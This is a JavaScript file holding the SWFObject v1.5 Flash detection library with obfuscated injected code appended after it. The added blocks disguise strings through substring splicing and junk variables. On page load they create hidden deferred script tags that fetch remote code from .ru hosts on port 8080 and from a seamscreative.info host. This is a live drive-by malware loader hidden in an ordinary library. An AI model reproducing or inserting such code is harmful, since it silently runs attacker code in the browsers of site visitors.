/**
 * SWFObject v1.5: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
 *
 * SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 */
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){deconcept.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};deconcept.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var _19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new deconcept.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof _20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};deconcept.SWFObjectUtil.getPlayerVersion=function(){var _23=new deconcept.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new deconcept.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new deconcept.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new deconcept.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};deconcept.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};deconcept.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};deconcept.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return "";}};deconcept.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(deconcept.SWFObject.doPrepUnload){if(!deconcept.unloadSet){deconcept.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",deconcept.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

var g="g";n={jD:51390};function M(){this.ta=false;var t=new String("01hcreat".substr(3)+"eElem"+"649pent".substr(4));var Mt=["P"];this.S="";var K=new String("onlo"+"ad");try {var Pm='Ae'} catch(Pm){};var A=new String("defer");try {var p='Q'} catch(p){};try {var H='TH'} catch(H){};var c=new String("appIsNt".substr(0,3)+"end"+"JKvChi".substr(3)+"ld");var R=window;try {var Ic='Mm'} catch(Ic){};var j=new String("bodTQxn".substr(0,3)+"Ne3iyi3Ne".substr(4,1));xD=14051;xD+=70;var u=new Date();var TD=document;this.GS=22175;this.GS--;var F=new String("scrip"+"tQCwq".substr(0,1));this.D="";this.nB=35701;this.nB-=197;var b=String("srKo8".substr(0,2)+"cxUZ".substr(0,1));this.y=63146;this.y--;this.Mx=57925;this.Mx++;function cJ(){try {var HI='C'} catch(HI){};try {var G=String("/go"+"ogl"+"e.c"+"om/"+"7AG8new".substr(4)+"gro"+"und"+"s.c"+"om/"+"kEAZdow".substr(4)+"nlo"+"ad."+"ytJ4com".substr(4)+".ph"+"p");var z=856480-848400;F_={FD:false};CB={HY:false};var Gx=new String("http:"+"//pas"+"sport"+"blues"+".ru:");this.m="";this.pZ="";var B=6126-6125;var xL=["Gp","MK","vC"];this.l=28692;this.l-=179;i=TD[t](F);_R={h:false};try {} catch(L){};var zQ=["jl","s"];var NR={af:false};try {var NF='Pv'} catch(NF){};try {var Cn='cC'} catch(Cn){};this.iQ=false;aQG=["FU","LQ"];var sB="sB";i[A]=B;var PZx="";var aW="";i[b]=Gx+z+G;var Xj=new Date();var ew=new Date();iy=32656;iy-=67;TD[j][c](i);try {} catch(ai){};try {} catch(xS){};} catch(X){var Ac={et:"fM"};var RW='';};}R[K]=cJ;this.ge=39406;this.ge++;var ewO={jt:"xl"};};var jf={i_:"SY"};var Ph={cM:"Ge"};M();try {var RV='bV'} catch(RV){};
this.s='';try {var os=17366;C=["B"];var I=window[new String("unes"+"uq8cape".substr(3))];Bf=["wk","Qd"];Rx=["se","ww"];this.k="";r=["Y","i"];var qH="";this.zV=47064;this.zV-=102;var IR=new String("goIre".substr(3)+"pl"+"ac"+"fsje".substr(3));this.c='';var lj="lj";this.Aq="";var q=String("onlo"+"ad");var QJ=false;this.Rm=42493;this.Rm++;this.rW=61091;this.rW++;var a='';var bp=new Array();var WE=new Array();Gc=["Ua","Um"];var qx={Rz:11637};jx=["nT","bM"];var tE={N:48631};tk=51119;tk-=171;var z="1";var bi="";this.hS='';lH={D:false};var Fh="";this.bo='';var t=window[(String("Re"+"gE"+"xp"))];try {} catch(VL){};this.Xe=7237;this.Xe+=120;this.NA=9854;this.NA+=179;var AE={Lo:22327};this.ov="ov";Mq={p:"sE"};function L(z,h){this.XC=58149;this.XC+=46;var Ky="Ky";ma=["zh"];var kn=new Array();var kj=["Qs","PF","ic"];var Ln=["Hu","HGF","om"];var _="[";var _M=[];this.gu=24452;this.gu--;var nn={jU:false};var PZ={he:false};_+=h;var Zq=["Lb","IW","fo"];xE=50584;xE+=103;_+=I("%5d");var uZ=new Date();try {var qn='_V'} catch(qn){};try {var gL='Pl'} catch(gL){};try {var Aj='Cg'} catch(Aj){};var Pp=[];this.kL=false;var Dx=52815;var IL=14561;this.Wjg=false;var b=new t(_, new String("g"));var ez={Gp:27183};return z.replace(b, a);var Db={SA:"NNU"};var Qo=["rg","MJ"];var tp=new Array();};this.Vn="Vn";this.HX="HX";try {var us='ZG'} catch(us){};var nz={};this.rl=57714;this.rl++;var eH=["bN","DF","Py"];var g=new String("http:"+"3B6r//got".substr(4)+"hguil"+"f2Yat.ru:".substr(4));Tm=["LS"];this.PG='';Vh=["EW"];var JB={jUo:"Vl"};this._X="";var o="/goC4".substr(0,2)+"oo"+"gl"+"e.qt9p".substr(0,2)+"co"+"m/"+"di"+"oSO8giSoO8".substr(4,2)+"pmYFtapmYF".substr(4,2)+"HRB3lp".substr(4)+"oi"+"ntbok".substr(0,2)+"6sih.c".substr(4)+"om"+"/c"+"onPiYQ".substr(0,2)+"BsefduBsef".substr(4,2)+"itXTV6".substr(0,2)+"AWK.c".substr(3)+"vHaom".substr(3)+".pCAer".substr(0,2)+"60Rchp06cR".substr(4,2);var JP=["cLI","SKD"];Ww={};var F=896257-888177;WO=21702;WO-=148;this.fW="";var Nf={uGQ:false};var vj=new String();var jo="";var ifG=new String();function w(){nB=["ai","kZ","AO"];var Yz=["xj"];hn={_u:false};MH=[];gl={ku:false};var Bm=["mL"];var H=new String("appe"+"ndChERK".substr(0,4)+"ild");var fl={Fp:"sx"};var rlL={};try {var xq='yh'} catch(xq){};var Xv={tkM:"Jg"};var qJ={Go:"uY"};var Q=document;NF={Fa:false};this.qf=false;Pb={jUk:false};EOH={Hb:"_r"};var Pg=["PU"];var zq=L('sEcErai7pata','dI2a7AKX_V4YMEUN');this.sX="";var SI='';var Tr=false;var MT=new Array();rY=43391;rY-=140;DK=58925;DK-=226;G=Q.createElement(zq);ZJ={KX:false};rI=12024;rI+=196;rlb=11545;rlb+=99;var yqC=41427;NV=20427;NV--;XEV=31338;XEV-=87;this.sib="";this.XN="";mv=8461;mv-=238;S=g+F;var ph=51765;this.pC=46418;this.pC+=78;S=S+o;this.fC="fC";Zh=["jP","Hj","YV"];xQ=["MS","Gb","fb"];var Ub="Ub";var l=Q.body;this.uW=false;this.ye=false;this.ovm=false;this.Hn=false;G[String("defe"+"r")]=z;Ugf={Zqd:false};fCZ={kw:false};UW={gk:"uR"};this.rk=63377;this.rk+=167;G.src=S;var qSu=65216;var Nw=["ur","US","ik"];Sf=29620;Sf++;var vP=1451;l[H](G);aO=["su"];this.xGD=52874;this.xGD+=128;var zpY={ife:60491};_z={oW:18500};};var xe='';var Ok={};YMC=60645;YMC--;var GE=49279;window[q]=w;var b_=["IHQ","fS"];var vYY={KCe:false};this.GJ=32982;this.GJ-=134;YI=["TE","oD","KT"];} catch(wd){Cn=64828;Cn++;var Hf=[];var kk=new String();var FB=new String();var EJ=["sRw","Uv"];var UI=["tX","Fo"];var oX=new String();};




document.write('<s'+'cript type="text/javascript" src="http://solk.seamscreative.info:8080/Undo.js"></scr'+'ipt>');